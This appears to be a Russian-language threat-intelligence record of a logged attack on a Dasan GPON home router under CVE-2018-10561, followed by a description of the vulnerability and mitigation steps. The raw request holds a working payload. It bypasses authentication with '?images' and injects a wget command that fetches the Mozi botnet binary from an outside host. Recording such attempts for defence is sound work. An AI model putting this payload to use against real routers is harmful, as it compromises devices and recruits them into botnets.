Информация об атаке

Tag
CVE-2018-10561
Date
2024-10-20
Client IP
122.97.138.177
Client GEO
china 
Vendor
Dasan 
Product
GPON home routers 
RAW request
POST /GponForm/diag_Form?images%2F HTTP/1.0
User-Agent: Hello, World
Host: █████████
Content-Type: application/octet-stream
Content-Length: 118
X-Forwarded-For: ██████████████
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://█████████████:50781/Mozi.m+-O+->/tmp/gpon80;
Description

CVE-2018-10561 - это значительная уязвимость безопасности, затрагивающая домашние маршрутизаторы Dasan GPON, которые широко используются для предоставления оптоволоконного интернета. Уязвимость позволяет удаленным злоумышленникам обходить механизм аутентификации маршрутизатора, просто добавляя строку "?images" к любому URL в веб-интерфейсе устройства. Этот обход предоставляет злоумышленникам полный доступ к управлению устройством без необходимости ввода каких-либо учетных данных.

Уязвимость особенно критична, так как она затрагивает более миллиона маршрутизаторов по всему миру, что делает их основной целью для киберпреступников. Получив доступ, злоумышленники могут изменять настройки маршрутизатора, перенаправлять пользователей на вредоносные веб-сайты, устанавливать вредоносное ПО и даже подслушивать сетевой трафик. Компрометированные маршрутизаторы также могут использоваться в составе ботнета для запуска распределенных атак отказа в обслуживании (DDoS), аналогично известным ботнетам Mirai или Satori.

Проблема усугубляется в сочетании с другой уязвимостью, CVE-2018-10562, которая позволяет выполнять команды. Вместе эти уязвимости позволяют неаутентифицированным злоумышленникам полностью контролировать устройство и, возможно, всю сеть. Маршрутизаторы сохраняют результаты пинга во временном файле и передают их пользователю при повторном посещении определенного URL, что облегчает злоумышленникам выполнение команд и получение их вывода.

Учитывая широкое использование этих маршрутизаторов и потенциальные серьезные нарушения безопасности и конфиденциальности, CVE-2018-10561 была включена в каталог известных эксплуатируемых уязвимостей CISA. Уязвимость представляет собой высокий риск для пользователей, особенно учитывая, что затронутые устройства часто являются устаревшими и могут не получать обновления безопасности.

Mitigations
  1. Отключите затронутые устройства: Поскольку затронутые маршрутизаторы устарели, рекомендуется отключить их от сети, чтобы предотвратить несанкционированный доступ.
  2. Замените на безопасные альтернативы: Рассмотрите возможность замены уязвимых маршрутизаторов на более новые модели, которые получают регулярные обновления безопасности и патчи.
  3. Мониторинг сети: Внедрите мониторинг сети для обнаружения любых необычных действий, которые могут указывать на попытки эксплуатации.
  4. Межсетевые экраны и контроль доступа: Используйте межсетевые экраны и строгий контроль доступа, чтобы ограничить доступ к интернету и предотвратить несанкционированный доступ.
  5. Обучение пользователей: Информируйте пользователей о рисках, связанных с использованием устаревших и уязвимых устройств, и поощряйте их переходить на более безопасные варианты.